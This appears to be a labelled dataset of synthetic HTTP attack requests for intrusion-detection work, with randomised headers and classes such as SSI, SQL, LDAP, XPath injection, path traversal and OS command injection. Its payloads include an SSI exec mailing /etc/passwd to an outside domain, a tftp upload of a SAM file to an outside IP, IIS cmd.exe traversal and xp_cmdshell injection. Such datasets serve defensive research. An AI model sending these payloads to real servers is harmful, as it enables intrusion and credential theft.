Transfer-Encoding: gzip
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43681
Start - Id: 40001
class: SSI
GET /4P.tiff?dinmoqo=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fmail+++d3oRmx.com++%3C++%2Fetc%2Fpasswd%22--%3E&snh=535&geon9wg=sSdh4te HTTP/1.1
Host: 134.34.123.221:80
Connection: close
Accept: audio/basic, text/html
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip;q=0.2, compress, identity
Accept-Language: 9etf-seoLrezg, sX-ot;q=0.9, n-enctsotd, prluels-sattEr;q=0.7
Cache-Control: min-fresh=38678
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Fri, 01 Jul 05 23:06:53 CET
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: si3i=ayrD2qe
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "dcIm5kvGygEa88tv9lZ"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Sat, 10 Nov 07 15:50:00 CET
Max-Forwards: 24
MIME-Version: 5.0
Pragma: l=e0oifetL
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=auth-int
Range: 33658-,347-
Referer: http://jvEat.gov/fRgsy/imrcn/X1gslae/gdnh.mspx
TE: deflate;q=0.0
Trailer: TE
User-Agent: oHW04h4l_ http://www.aoeaha.be
UA-CPU: Sparc
UA-Disp: 2956,4144,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40001
Start - Id: 44899
class: PathTransversal
GET /sh9/jRRtk/1f/ttg8eomstgz0oEtkds/rH/Tnjpaietrllvonsey.exe?ensn=e%7EexeciD9%3D7jto%2Bmd+oe&hgN1c@EUAyrm=7285723&yaeeiGthierp5s=hi&pE4O=zsI+otnod+%2F&txsu1oewsrfl=1nasethl&Ttoeuomory6jR=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&tMtgrdldAtrD=r6d%3Be&aaeoOy=stoerihotfrao9a HTTP/1.0
Host: 135.212.229.50:407
Connection: close
Accept: audio/x-wav;q=0.2, video/mpeg, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="65"
Date: Tue, 24 May 05 10:47:13 CET
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Tue, 25 Jan 05 19:21:24 CET
If-Unmodified-Since: Sat, 16 Oct 04 03:34:08 CET
If-Match: *
If-None-Match: "SGgE56gmVyThjgVd"
If-Range: *
Max-Forwards: 22
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest realm
Range: 78821-,-584,26-7
Referer: /aiezHel3/otdece/stgehy/iiceq/ed7o0.js
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: nm5Co/8.7.6
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: 8.6 www.Rhpnol.html:2
Transfer-Encoding: gzip
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 647 www.4rtd.shtml "hrxe" "Sat, 11 Oct 08 22:03:34 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44899
Start - Id: 39175
class: SSI
POST /4./nC7hV7zF-yu/eRflerZ5uRNgI0ffdp/hnanrfutkhtEarAht/zriMl5jFQRFl/heorxsniTfnrTtwi8h5i/ylSeso8ieod/eGccBm6qIvkqBAQsukd5/tenklbdHwaheq/uqSSO7FfhohuIn/wF.shtml? HTTP/1.0
Content-Length: 236
Content-Language: ktuHeai
Content-Encoding: identity
Content-Location: /rbeh/vdrk5/dfqo/Ace9iic/possu.mpeg
Content-MD5: ZWNYOHF0cnRFbm9vc250OQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Nov 08 12:51:52 UTC
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: 58.255.166.162:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.3, deflate, deflate
Accept-Language: 61S-bgb5;q=0.8
Cache-Control: no-cache
Client-ip: 105.29.124.80
Cookie: APRYGreplaceV6udvL=alrgmocemuwmy3l;5c3HT=8;osdrocm7rserls=7th>drop;Vf==hwe
Date: Mon, 16 Jul 07 10:19:38 UTC
ETag: W/"2WXL7_HNCc1LU44Hf"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.6
Pragma: 34arsk=eeta
Authorization: NTLM NG9vZW5FcGEzOGVudXpZb0tjdGV4bW10ZGJhZWloMXdmZWdMU2VjOXRi
Referer: http://t56a.de/uohQ/apre.swf
Trailer: Pragma
User-Agent: Mozilla/7.4 (Windows; U; WinNT 8.9; oa-js; rv:1.2.4) Gecko/19462642
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: compress
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

dbbilztee=<!--    #exec cgi="/cgi-bin/script?hGetjrgnt7" -->&lwTAeoiNtsiEpd=947&50no=a1puwinnterb=r5q+nhsi&oiizxhjemh=ti&05sEcsd=ck0ranst&&tSlqgeddswanthe=808&xdzEt=o03&iewIv4ae=iuhtpasst&Eblyisgia3e=gxe1ebichD

End - Id: 39175
Start - Id: 44591
class: OsCommanding
GET /raQudlTnqtU/luaEe/Nsnmu4ema5geiPbna1/https0dgroup by4WlCHi26Am/e0ren/ozEft0KcW.KPz_sEM/a6SlyeS43-5wev/lWc5YHOklU/hMdocumentDHkNjEk.php3?arrieiuutii=789&ezsloibiul=56.120.221.247+++++%7C+++++tftp++++-i++13.143.57.25+PUT+sam._ HTTP/1.0
Host: 189.160.76.174
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: EoNrS=6eroon
Client-ip: 61.207.233.103
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="6"
Date: Wed, 17 Feb 10 07:06:18 UTC
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Fri, 20 Aug 04 03:37:18 GMT
If-Unmodified-Since: Thu, 09 Jun 05 05:10:08 UTC
If-Match: *
If-None-Match: *
If-Range: "@hOfBTNGPJ9PYZfU__O"
Max-Forwards: 7
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: Basic bmNvaWxvY3k6b2xzZnJiaHU=
Range: -2578
Referer: http://tr3elo.gov/dhrq0ne/kneaiex/rioesy/noTitTe.msf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 7.1; er-Ta; rv:6.4.1) Gecko/46152098
UA-Color: color8
UA-Pixels: 905x8117
Via: 7.9 www.iakk.gif, FTP/8.9 27.142.127.246
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: stnat6/0.0
Warning: 383 www.Mece.jpeg:13 "gitirtep1tr" "Mon, 15 Feb 10 03:00:27 CET"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44591
Start - Id: 49869
class: XPathInjection
GET /z1q8SC5Sm/eepEbhooeta9r/9whBejoC/9aascmYreNqtrzz5/trdiscOgemEre/yzvG/m29bTJBtse4/ovonc/E6tsbna4enT/3Q7/sNO.J7e5fg.php4?etxlygnAg=a+usruia5j&YadminLwlogQNp9=bbUes9s%27+++++or+Hsoesy%2Fness%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D60%5D+++or++%27Bepsis%27++%3D++++%27&aesfo7=arm5ne&g2Cwget3UUy2usrI=mt5dt%3C HTTP/1.1
Host: 221.171.205.156
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.3, cp-936;q=0.8, x-mac-ce;q=0.9
Accept-Encoding: identity;q=0.1
Accept-Language: U-l8, tqwtb-Etsdw
Cache-Control: no-store
Client-ip: 119.142.72.137
Cookie: QAfP238includePnode= mtk 0etc;gs=oat;uBoZAlhavingJ=frsilbreoeR;SmmidDiss5iy1ya=plOe?rli0swget?s+r~s;w7it80vboot.iniMmhK=ah&sosinputu e8R9;ir0zmreilE=es$eo 
Cookie2: $Version="5"
Date: Fri, 17 Feb 06 09:23:22 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: tajndmm=ofRreo;yttbd
From: eslc7@67owp.net
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: "19_3BJsKDay5vKQ02B"
If-None-Match: "kjPd5foA5vT_XVe7DJN"
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 0
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: -307462,64-76604
Referer: http://www.lnfuya.uk/uo01r99y/tiht/dphEnhsm.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: bnohlteBjdo7wierite
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: FTP/3.2 34.175.39.4, 0.2 www.lealo.png
Transfer-Encoding: gzip
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49869
Start - Id: 37710
class: LdapInjection
POST /sdQ6l/5wr/z1eepahfTqira9tsb/hi/0rf/utuEhecto/N65L7_V/N3e5a.png? HTTP/1.1
Content-Length: 143
Content-Language: eradsnd,bsteKCst,eht1
Content-Encoding: identity
Content-Location: /ilht.css
Content-MD5: cm9jZG1yNmVsdGxzN3JlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 08:47:11 CET
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: www.shtoa.org:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: a-uu
Cache-Control: 0e=w
Client-ip: 138.27.65.32
Cookie: daestreLitiv=q;Eo=mhneIeaser;snoteeeprngtBw=4o5aa7gvtaneeleo
Cookie2: $Version="321"
Date: Sat, 01 Oct 05 14:09:11 GMT
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 31 Jul 06 10:33:05 CET
Max-Forwards: 60
Pragma: NiDeei='q00d'
Authorization: ncei fjPt=tmid
Referer: http://www.rnpeu.uk/eKtdE/esoemo.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.3 (compatible; MSIE 7.8; Win98; den3ttm; cp0mcN; sant7un)
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8766x859
Via: ltpd/2.1 228.122.131.86:78
Transfer-Encoding: identity
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321

as=l<lew5jls&soaui6nomijid0c=yqlBgQDx&hyi=tr)( |  (il=*)&dhco2i2nGoTih=eieih4agn3easas&i7il=2&TIBWD9U=rcpo| ;6oqcin&gQde 7a

End - Id: 37710
Start - Id: 42115
class: SqlInjection
GET /onnseHnisI1/0QGjo/Re9iTlnhdGaowt5pn/cA4BoFFWnlZ/HneniOeuxceoh3eny/d-ea1QLf.Ui15/fAlneel/TfAN8nxp_ZozSRacM/weo83hrwnc.aspx?e4ri9emrifm=3312&rgh=5&itetlowsfseel=978&owc3poT=2+or++id%3E2++++or++ls_id%3C73&sjdth5nzLuN=rd HTTP/1.0
Host: www.ffdii.org
Connection: iICPute
Accept: audio/*;q=0.8, application/postscript;q=0.8
Accept-Charset: iso-8859-15, iso-8859-15, iso-8859-4, koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: horo7-A;q=0.9, a0wsop8i-d, oieic-Ajmri6r;q=0.6, et-h, H8nes-ict
Cache-Control: max-stale
Client-ip: 110.156.210.85
Cookie: E24OTeutdihuaov=92424;dr2Ead2sJn=tnhnjaur;pnuaeW=36;YAW.2w.=s4vdae7enraaxa;aiVeatmCe=mEsz
Cookie2: $Version="34"
Date: Fri, 16 Feb 07 04:57:26 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: 100-continue
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Fri, 21 Mar 08 17:55:01 CET
If-Match: "KmL6w.ReBGH8FP51tWr"
If-None-Match: "EFDCd3IKj7.--jOC"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 153
MIME-Version: 8.4
Pragma: ej5Q=wnota
Proxy-Authorization: nds34g oiEb=r4tb
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: /ogiM.php
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (compatible; Konqueror/8.5; Windows NT; tn3OO2p; qaagiteog; gUCoeIerue)
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: 4.6 241.194.76.226
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42115
Start - Id: 39702
class: SSI
GET /JbexecTqKSX3JQ/lGFWn9rIv/sveotepmteigaH/iY2IdkzwfJ@m9iO/iKCC79/VhgP9F/eA3jjluZ71R.HHy/t8rDQHJhuySNs/nE2Xh478/n8UuFkN5JhU.css?phlCetsirlhaod=n4yoDY&mah=%3C%21--++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&Gkoptgwinnt=6 HTTP/1.0
Host: 15.6.215.150:710
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ila-nrssAan, ehw5i4h5-rwieen;q=0.0, t-uiotdt;q=0.2, ue-ATeGsrb;q=0.0, qYtoos-evbuct
Cache-Control: only-if-cached
Client-ip: 120.48.93.141
Cookie: no=654908815;jGaicCem=636;nwecHuSnseavai=aL5XhG0jT7i-;2hep3tN=71715132;uwg0vEDssrded=763437;bJnmgc9= id
Cookie2: $Version="4"
Date: Sat, 20 Aug 05 18:30:12 GMT
ETag: W/"Wrw3vQ7vQ8v1UON9"
Expect: 100-continue
From: dOrrrspe@5lmtas.st
If-Modified-Since: Sun, 04 May 08 01:39:28 UTC
If-Unmodified-Since: Tue, 27 Jan 04 19:43:28 UTC
If-Match: "0HXU9vo7gOStV6lt"
If-None-Match: "hGfZYhPe6fjVvRrqz7SR"
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 0892
MIME-Version: 7.2
Pragma: dlhtr='fse'
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 61-,98874-5,222224-
Referer: http://www.ongeh8d.com/nx64tira/crtle0nd/enzb.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 6.4; ae-is; rv:5.2.3) Gecko/32242650
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/5.2 112.213.126.132:122, Aecwe/5.7 5.217.236.76, 9.2 www.MEaiimT.jpg
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39702
Start - Id: 43741
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 28.226.160.37
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, x-mac-turkish;q=0.9, euc-jp;q=0.6
Accept-Encoding: 
Accept-Language: Tn9-rrAz;q=0.3, 0Nt-Mn2s;q=0.2, pcee-Ormeipai;q=0.7
Cache-Control: no-transform
Client-ip: 42.85.153.5
Cookie: geeecaysiwl=t h8dyhyl elIan
Cookie2: $Version="25"
Date: Wed, 11 Jul 07 01:49:28 GMT
ETag: W/"MJRYeoM9MNrdpNUXW"
Expect: e5yilnee=dPfoEs
From: m8Lou@dteama.it
If-Modified-Since: Sun, 11 Mar 07 07:15:10 CET
If-Unmodified-Since: Sat, 29 Apr 06 04:57:29 GMT
If-Match: "5Ca07Mlw.icw.VCsV"
If-None-Match: "I7ZTKJT.r8qMVGsDvIRf"
If-Range: Sat, 29 Nov 08 10:17:49 GMT
Max-Forwards: 67
MIME-Version: 0.1
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: rguud skwsaiq=hCtyg
Authorization: Basic amVyYWNSOnV0ZWg=
Range: 24481-,44476-
Referer: http://www.fRe3.cz/88sd/rrwwpn.cfm
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: WMaoleuia2 (bMYCdn; mqAXCG; e4o-dFon; sTDxIuB2UJ)
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 337x2229
Via: 5.0 206.90.109.117:85, 4.7 www.m7neas.tiff:99708
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43741
Start - Id: 43940
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 7.107.71.18
Connection: rzne0
Accept: video/quicktime, text/xml;q=0.0, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: pyts-rtaite;q=0.9, wYrIt-veng
Cache-Control: R7zserrq=Linud5m
Client-ip: 203.44.173.36
Cookie: 0lTbeepccarme=68476;ubiangqa9=7982;dcoeoenicltmhox=pk=eaccess_loger5D;dxellJn0ae2seiN=5;iH=betweenTMzuenuaararrs
Cookie2: $Version="4"
Date: Thu, 03 Jan 08 13:27:48 GMT
ETag: "CAA1BX3UtwQhtOdd"
Expect: Ktdna
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Wed, 01 Jul 09 13:22:08 CET
If-Unmodified-Since: Wed, 20 May 09 06:05:33 GMT
If-Match: "D2.z7TCFzeJ0kUrcB7SJ"
If-None-Match: *
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 78
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM QWhESWxkZ3lubHNJd3l3eWhkeVJvYWFlb3JtbnBhU2FhZjJlZXp1bm5jZQ==
Range: 080946-24031
Referer: http://www.Lvjessi.ch/dnsvi/sthc26n.doc
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: sj7sHev-q http://www.suhyur.biz
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 3.5 www.mfdfo.jpg
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43940
Start - Id: 36416
class: OsCommanding
GET /wqqeidIaoR7SalndahT/ddIs/5o9_/d8brIv0EAKy/E0upt328/hn/shoeregZtovceeo/tEtrO1rnyea/np_OE6v1I4/age.html?xpwLjbpahmo=gckrn6xcaUEay&gsn6ni=dto1ehdceehims&5oe.Vc=051259&uDVy9l.6vt@f=%7Ctscript&n3elimRAnlie=3809490&tainniiecGogi=egIEat&oinleoNwfia5hMa=68788&itqesNasJfh=5172056&ntr2ic=nahllet-f6tu&ae4o0i4cw92Of=iP&eoloeo0sPFuaIu2=%27%3BEXEC+++++master.dbo.xp_cmdshell++%27cmd.exe&ere2cieewli=winnttIe&oap=88286 HTTP/1.1
Host: www.umrruih.it
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5959
Client-ip: 133.214.196.239
Cookie: jprocessing-instructionG3.QKWNunioniS=me 8corEnetp
Cookie2: $Version="16"
Date: Tue, 25 Mar 08 19:55:38 UTC
ETag: W/"YT.5ak_-X1COeh8SvA5a"
Expect: 100-continue
If-Modified-Since: Sat, 01 Oct 05 09:54:40 UTC
If-Unmodified-Since: Tue, 30 Jan 07 20:09:09 CET
If-Match: "qQ7FUbjuRYoA3.xk@vHL"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: "KgjMH2dZUc13@9G77g-"
Max-Forwards: 4
MIME-Version: 3.6
Pragma: 3dihw=n1dfqh
Proxy-Authorization: NTLM dW56NWF1ZWVsdGE1aHJpb3NzZTN1cmhudGlvTnRpbnNhb3F0U3hvZXRmbUk=
Authorization: ibeszs htdiuh=Ss4i
Range: 15-,7348-823
Referer: /nerpio/urjees/0dssin/eNsa.msf
TE: trailers,gzip;q=0.7
Trailer: Referer
User-Agent: Ic4hatoIam (aVYSNQ.EC; lz@W_v)
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 811x0670
Via: HTTP/4.5 www.Ni92.tiff, 5.6 www.tSmnota.js, eah/0.9 www.tooe.css
Transfer-Encoding: gzip
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 492730775848
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36416
Start - Id: 39343
class: SSI
GET /Avfrh7Wd2wTjsP/a@y/dicNIbecsfeiuasrSrs/rua4ohmtl6/enV59OCr0a72VZY6ih@/eqLZpspN3B2OJM./nXdIra8r_DRhv/tmpwbkT/iiiittlbntng/GFHv7s.php3?A@0mnTpUA=a_2A&igsrnQnoeyhe=%27AY&ho=mhavingm+N&oeeu=aaSziei&acjnste=30&sj=pSGMVTXm&qgnellomh=asre8%29awms&eW5t9uaejgt=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 172.236.226.20
Connection: oilm
Accept: */*;q=0.2
Accept-Charset: euc-tw, windows-1251, cp-932
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 153.213.53.71
Cookie: n0icedpnNau=883;rmmehavingPJ5Ngroup by=etjhgdA
Cookie2: $Version="74"
Date: Fri, 07 Jul 06 12:37:48 GMT
ETag: W/"2pmeGZhNRIpjk2SWKzJ"
Expect: 100-continue
From: tuHdgsLz@bmsemyoDde.biz
If-Modified-Since: Wed, 12 Jan 05 06:07:25 UTC
If-Unmodified-Since: Fri, 25 Jul 08 02:55:54 GMT
If-Match: *
If-None-Match: "MYm.Q6bZb3-QYC9"
If-Range: Mon, 09 May 05 14:44:23 UTC
Max-Forwards: 04
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Basic c2FJYmV5OmV3dGZiNA==
Range: 422767-,0924-,61697-47592
Referer: /nSf2eJm/ssaeru/d0hhv9.jsp
TE: chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/4.2 (compatible; MSIE 7.2; Linux i586; ezEln2ahm; oOrek; ihLd)
UA-CPU: 68000
UA-Disp: 879,3811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3324x441
Via: 3.9 214.136.100.79, 8.6 www.ad8lT.tiff:45
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 330 59.99.71.16 "lsngqsttrt0oajgUtrih" "Mon, 05 Mar 07 23:21:49 CET"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39343
Start - Id: 44272
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 88.203.249.148
Connection: meP94a
Accept: audio/basic, text/html, text/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: yGsoG1=saTorV
Client-ip: 208.204.2.15
Cookie: uLpoygenej=703;shhnptnx=72;xsL8m5tqstw=ieutdn4ideaFcbb;6oNHcmd=117
Cookie2: $Version="544"
Date: Thu, 07 Jul 05 08:02:58 CET
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Mon, 27 Mar 06 18:15:17 UTC
If-Unmodified-Since: Sun, 28 Sep 08 17:11:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 276
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: ut2ox dtgbj=visno
Range: 1630-9,-816
Referer: http://www.aEar.net/qchseh0j/mairf/tnempuyv/e2eg.bin
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.5 (compatible; Konqueror/5.3; Mac OS X; tirdrelgle; 1e7lrtes; arnnoucar)
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: 3.7 18.162.215.2, tNl/9.7 www.Htal.htm:9
Transfer-Encoding: identity
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44272
Start - Id: 46009
class: PathTransversal
PUT /6T8Of7SHhyLeV2Z_IR/ihnaz1htcnkaeqceilno/a2XB3DqS/RNe3lnahemsFonoEetg.tiff? HTTP/1.0
Content-Length: 124
Content-Language: 4sotgPs,sso7po,nlz1ohoh
Content-Encoding: compress
Content-Location: /0rlms/imia/fnEtwoi/5ytrzsl/tttDwene.wmn
Content-MD5: b2dlZWFnYzlvcnlBNjFmYg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 05:11:24 GMT
Last-Modified: Fri, 11 Aug 06 14:50:41 CET
Host: www.lobvyu.biz:4
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: sHel-9iw4E, rrlsewri-5m8Ier1;q=0.6
Cache-Control: no-cache
Client-ip: 17.228.75.155
Cookie: Teme=17220;sk6aawael=..\..\..\..\..\..\WINDOWS\system.ini;tmpcOmLsam=2suoorget
Cookie2: $Version="30"
